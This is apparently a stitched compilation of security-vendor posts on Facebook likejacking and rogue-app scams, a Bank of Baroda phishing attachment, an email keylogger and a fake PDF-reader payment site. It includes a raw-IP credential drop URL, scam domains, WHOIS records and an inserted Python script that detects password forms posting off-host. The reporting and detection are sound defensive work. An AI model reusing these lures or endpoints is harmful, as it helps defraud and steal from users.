Right now there's a scam making its way across Facebook linking to a video titled "The Hottest & Funniest Golf Course Video – LOL" (example screen shot below). Websense customers are protected by ACE (Advanced Classification Engine). During the 15 minutes it took to write this post, over 7,000 new users liked the page, so it's clear this is a successful campaign.

This latest scam is very much like a lot of others we see on a regular basis on the world's most popular social networking site. But this one seems to be especially popular for some reason.

When clicking on the link you're taken to the following page, which tricks you into not only liking the page but also sharing it with your friends. It does this by using standard Facebook APIs.

The page that you are tricked into liking has been liked by over 272,000 users and doesn't really have anything to do with the scam itself but is perhaps there to make it look more legitimate. The quote "<name>, are you scared? Of course I'm scared. I'm not Superman" is a quote by the actor Jackie Chan.

After liking and sharing the page, and attempting to view the video, the user is taken to a typical CPA Survey scam, so in the end there's no video at all. Note that the attackers haven't even bothered to change the title of the last payload site. The title still says "Look What Happens When a Father Catches her Daughter on Webcam", which is another scam that went around Facebook months ago.

As always, if a video forces you to like, share, or install an app to view it, DON'T DO IT! And of course, install Defensio, our free security app for Facebook. It will keep scams like this from ever appearing on your news feed in the first place.

Posted in Facebook

What did this girl do on her webcam?

Facebook Scam Alert: ‘Everyone do check what she did on cam’ Spreading

We’re monitoring an on-going Facebook scam campaign that seems to be spreading faster than any campaign we’ve come across before.

What did this girl do on her webcam?

The scam starts with a user being tagged in a photo such as the one above. The photograph is posted in an album called “BBC News” to give it authenticity. It typically has more than 100 people tagged in it and it contains the following text: “Everyone do check what she did on cam …. — [URL]”

An example of what it would look like to see your friends tagged in this photo

The short URL typically redirects the users to a .info domain, which then takes the user to a Facebook Application Installation page.

Short URL redirects to the following Application Install Page

When a user allows the application, the scam continues with that user posting the same photo, tagging over 100 users in it and helping it propagate.

Over 100 Friends tagged in this scam

Users are also redirected to another .info domain, which contains a video that is gated by another form of a survey scam:

Facebook Verification Spam Bot – Freudian Slip?

The scammers have managed to be nimble enough to switch the campaign from one Short URL service to another. At first, this was spreading via Bit.ly:

Bit.ly Stats as this scam was first spreading

Over the course of an hour, this particular URL received over 80,000 clicks.  However, the scam has since shifted to the Goo.gl Short URL service:

Goo.gl Short URL Statistics for this scam

In less than an hour, the goo.gl version of the scam has reached over 125,000 clicks.

Recommendations: First and foremost, don’t click on the link included in the description of the photograph. One of the things you can do to prevent your friends/family members from falling for this is to untag yourself from the photograph:

You can untag yourself from any photo

Additionally, you can report the image so that Facebook can take action against it (this is an important step):

You can help prevent this scam from spreading by reporting it

If you’ve been tricked into installing the application, visit the Privacy Settings page and click on ‘Edit Your Settings’ under Apps and Websites.  Locate the Rogue Application under the Apps and Websites section (typically has the word “news” in it). Once you’ve located it under the  ‘Apps You Use’ section, click on ‘Edit Settings’ in order to remove the application.

Scammers are finding new ways to trick users. The key here is to be aware and to keep your friends and family members in the loop about scams like this one.  We can’t stress that enough.

Update: The goo.gl short URL has now logged over 220,000 clicks.

Over 220,000 clicks on the goo.gl short URL

Additionally, the scammers have also moved to TinyURL:

Scammers are also using tinyurl to lead users to the scam application

Posted in Facebook

Bank of Baroda Phishing Scam

Bank of Baroda is now being targeted by phishing attacks.

A mail with the subject line “MESSAGE TO ALL BARODA CONNECT USERS!!!” is being circulated, and it contains an attachment.

If you open the htm file, it displays a Bank of Baroda login form. This form is displayed from your local machine.
It asks you to fill in confidential information such as Corporate ID, User ID, Password etc.

We have analysed the htm file and found that it contains a fraudulent link, http://174.120.139.34/ ~buupy/images/log. php, and this is the link to which your confidential data is transferred.

Quick Heal successfully blocks the fraudulent URL and deletes the malicious htm file too.
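
The check implied by the analysis above, as an added example (not Quick Heal's code): parse an HTML attachment and report any form that collects a password and submits it to a remote host, noting raw-IP and non-HTTPS destinations. The sample attachments, field names and the 192.0.2.10 address are constructed placeholders, not values from the campaign.

```python
"""Flag HTML attachments whose login form posts credentials to a remote host."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the attachment described above. The address is
# a documentation placeholder (192.0.2.0/24), not the one used in the campaign.
SAMPLE_PHISH = """<html><body><h2>Baroda Connect Login</h2>
<form method="post" action="http://192.0.2.10/~example/images/log.php">
 Corporate ID <input type="text" name="corp_id">
 User ID <input type="text" name="user_id">
 Password <input type="password" name="password">
 <input type="submit" value="Login">
</form></body></html>"""

# Constructed benign sample: a form that has no password field.
SAMPLE_BENIGN = """<form action="https://www.example.com/search">
<input type="text" name="q"><input type="submit"></form>"""


class FormCollector(HTMLParser):
    """Collect the action, method and inputs of every <form> in a document."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", "").strip(),
                             "method": a.get("method", "get").lower(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                (a.get("type", "text").lower(), a.get("name", "")))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def is_ip_literal(host):
    """True when the host is a bare IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyse_attachment(html_text):
    """Return one finding per password-collecting form that posts off-host."""
    parser = FormCollector()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        if not any(kind == "password" for kind, _ in form["inputs"]):
            continue  # not a credential form
        url = urlparse(form["action"])
        host = url.hostname or ""
        if not host:
            continue  # relative action: nothing leaves the local file
        reasons = ["credentials leave the local file for " + host]
        if is_ip_literal(host):
            reasons.append("destination is a raw IP address, not a bank domain")
        if url.scheme != "https":
            reasons.append("submission is not sent over HTTPS")
        findings.append({
            "action": form["action"],
            "host": host,
            "fields": [n for k, n in form["inputs"] if n and k != "submit"],
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for finding in analyse_attachment(SAMPLE_PHISH):
        print(finding["action"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

A mail gateway or triage script can run this over every .htm/.html attachment; a finding on a file that was opened locally is a strong signal, since a legitimate bank login page is served from the bank's own site rather than from an attachment.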

Posted in Quick Heal

Scam email leads to Keylogger. Beware!

Among the many scam emails about “post express”, we found one that is unfamiliar, and we are pretty sure it carries a different piece of malware. Its subject is “Available for pickup”, and it includes an executable attachment file, “Sent.exe”.

Dear Sir
I have just returned and received your message — it is 2:25 am in Vancouver.

I have received a communication from your partner (I am forwarding it separately) and am waiting for an official translation that I will then take up with my colleagues.

Hence, the funds has been sent via western union and money gram respectively

REF: 9310 5521 Amount: 3000 CAD
MTCN: 764 327 9355 Amount: 2000 CAD

The payment receipt is attached in a single file

I hope to hear from you soonest

Both payments are available for  pick up

Sebat

We dug deeper into the attachment and found that it is a keylogger. From the decrypted configuration file, we can see the SMTP server used and the target email address to which the report is sent.

All recorded keystrokes will be sent to the target email address, along with your IP, computer name, and user name.

Keep your Emsisoft Anti-Malware up to date, and always stay alert and be cautious with everything you receive.

Posted in Emsisoft


Facebook Scam Spreading: ‘Hey, I just made a photoshop of you, check it out’

We’ve been monitoring a new Facebook scam that is spreading via Facebook Chat messages.  This particular scam usually begins with a chat message from a friend like the one below:

Example of the Facebook Chat message

Once a user clicks on the link, they are redirected via the site used in this campaign (hxxp://millium.co.cc) to a Facebook Application installation window.

Facebook App asks for access to Facebook Chat

The reason this is spreading so quickly is because the Rogue application is asking for access to Facebook Chat. Once the application is installed, it begins spamming your Facebook friends/family members with the same message seen above.

After the application is installed, the user is redirected back to the site above and presented with the following image:

Click on the picture to see yourself in a sexy photoshop!

Your attention needs to be diverted long enough to allow the message to spread to your friends and family. Clicking on the photograph takes you to a Graphic Design blog entry that contains 45 Strange and Funny Photoshop Manipulations – none of which feature a photograph of you.

This scam is spreading rapidly.  Over 88,000 clicks per hour, currently sitting at over 500,000 clicks today.

88,888 Clicks Per Hour

Over 500,000 Clicks Today

At this point, we do not know what the end game is for the scammers here. The destination site results in no malicious infection and does not lead to a survey scam. Having access to a user’s Facebook Chat could allow the scam application to be used to send out other messages.

If you or anyone you know have been tricked into installing this application, you can start by removing the application from your Facebook profile.  Visit the Privacy Settings page and click on ‘Edit Your Settings’ under Apps and Websites.

Remove the Rogue Facebook Application

Find the Rogue Application under the Apps and Websites section

Once you’ve located the application (named ‘millium’) in the ‘Apps You Use’ section, click on ‘Edit Settings’ in order to remove the application.

Remove 'millium' Rogue Facebook Application

Removing the application is one thing. We encourage users, both those who have been tricked into installing this application and those who haven’t, to reach out to family and friends on Facebook and inform them that this scam is spreading.  Knowing is half the battle.

Posted in Facebook, Security

Facebook scams becoming increasingly multilingual

When I was checking Facebook this morning, I spotted some friends posting the same message all over their friends’ walls. Well, another likejacking scam I assumed. So I did what I usually do when this happens, I wrote them a quick note telling them to clean up their Facebook apps and delete the wall posts. Nothing spectacular so far, as this happens on quite a regular basis. But wait… something’s different this time: the whole scam is delivered in German! A really rare occurrence, but something which I expect to happen more often in future. “Why?” I hear you ask. Well, here’s my theory:

About 70% of all Facebook users are based outside the US which means more than 350 million people, according to official Facebook statistics. These users don’t speak English as their native language for the most part. For cybercriminals, this means that they miss the larger part of their target audience. Since most people in the world understand English, previous scams of this type worked out quite well, but they were also easy to spot outside the US and the UK, because it’s quite odd when people start writing messages in English when they usually don’t. At the same time, likejacking scams have become better known among users of social networks. For these reasons the people behind the scams are doing what they started doing with spam years ago: they are localizing the content in different languages to broaden the target audience. While the messages in those days were heavily flawed in terms of language and design, the process with today’s social networks has been perfected much faster, as this example proves:


The scam is about a rollercoaster accident in one of Germany’s largest fairs and offers a video of it. The additional comment by the victim says:

“Hey have you seen that? Unbelievable. Couldn’t even watch it till the end. Will NEVER ever ride rollercoasters again.”

The link leads to the Facebook app’s site. The section on the right, which advertises itself with more than 420,000 Facebook fans, has been faked. It’s part of the image.


After clicking the link, you will be asked by a Facebook app to grant access to your profile data and allow it to post to your wall.


After allowing the app access to your account, you will be redirected to this webpage which promises to let you watch the video and also gives a warning about the disturbing content.

Before that, however, you have to take part in a survey. The webpage sells this as an anti-spam function. This website will monitor your progress in the survey, which opens up in a new window. The people behind these scams put a lot of effort into creating statistics to find out how well their scam worked – which is also the case here: they run various scripts to collect information on how many people visited the page, which survey they took and where the user comes from by using GeoIP services.

The surveys are about love and relationships and they promise to send your personalized result by SMS. By giving your mobile phone number, you’re subscribing to the service for €2.99 every 5 days, until you quit the subscription.

After completing the survey, you’ll finally get to see the video – which by now has already been removed because it violated the terms of use of the site where it was hosted.

If you see such a scam spreading among your Facebook friends, please notify them and tell them to remove the app as well as wall posts. Provide a link to this blog post to educate them about this type of scam. Scams such as these only work when people react to them.

This case has been reported to Facebook.

– Christian

Posted in Facebook, Kaspersky

Download Adobe Reader 10 Alternative scam

MX Lab reported earlier on a malicious spam campaign offering a PDF Reader/Writer for Windows and Mac to download and buy, in the articles “Malicious spam campaign regarding Adobe Acrobat 2010 PDF Reader and VOIP Addons for Skype” and “Emails offering PDF Reader 2010 lead to unsecure payment site”.

MX Lab noticed a new version that offers the latest PDF Reader. The emails have the subject “Download Adobe Reader 10 Alternative” and come from the email address dailynews_dec09@m120.redmediaone.com.

This is the body of the email:

Following the link to the web site will lead us here:

When clicking on the download button we have the following screen that looks very familiar:

Okay, let’s go through the registration process:

The registration transactions are performed on the domain secure-signupway.com. This domain is known for fraudulent payment processing, so your credit card details will end up in the wrong hands.

Now, this is also interesting. The domain from where the message is sent, redmediaone.com, has protected registrant details in the WHOIS.

Registrant:
   redmediaone.com
   c/o Whois Privacy Service
   PO BOX 501610
   San Diego, CA 92150-1610
   US

   Domain Name: REDMEDIAONE.COM

   Administrative Contact, Technical Contact, Zone Contact:
      redmediaone.com
      c/o Whois Privacy Service
      PO BOX 501610
      San Diego, CA 92150-1610
      US
      (619) 393-2111
      whois@emailaddressprotection.com

   Domain created on 18-May-2010
   Domain expires on 17-May-2012
   Last updated on 25-Mar-2011

   Domain servers in listed order:

      NS1.DOMAINDISCOVER.COM
      NS2.DOMAINDISCOVER.COM

The message contains the download URL and an unsubscribe URL that is handled by http://list.onemediaclick.com/. In this case too, the registrant details are protected.

Domain Name: ONEMEDIACLICK.COM
Registrar: MONIKER

Registrant [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US

Administrative Contact [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Billing Contact [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Technical Contact [3559862]:
        Moniker Privacy Services ONEMEDIACLICK.COM@domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Domain servers in listed order:

        NS1.DOMAINSERVICE.COM         208.73.210.41
        NS2.DOMAINSERVICE.COM         208.73.211.42
        NS3.DOMAINSERVICE.COM
        NS4.DOMAINSERVICE.COM

        Record created on:        2011-02-14 12:05:30.0
        Database last updated on: 2011-02-14 12:05:32.93
        Domain Expires on:        2012-02-14 12:05:31.0

The web site of  Onemediaclick:

These guys are, according to the address on the site, located in Switzerland. When trying to contact them through the web form, nothing happens. The <form> tags are not included in the web form when looking at the source. Seems to me that this whole business can not be trusted.

Posted in Security
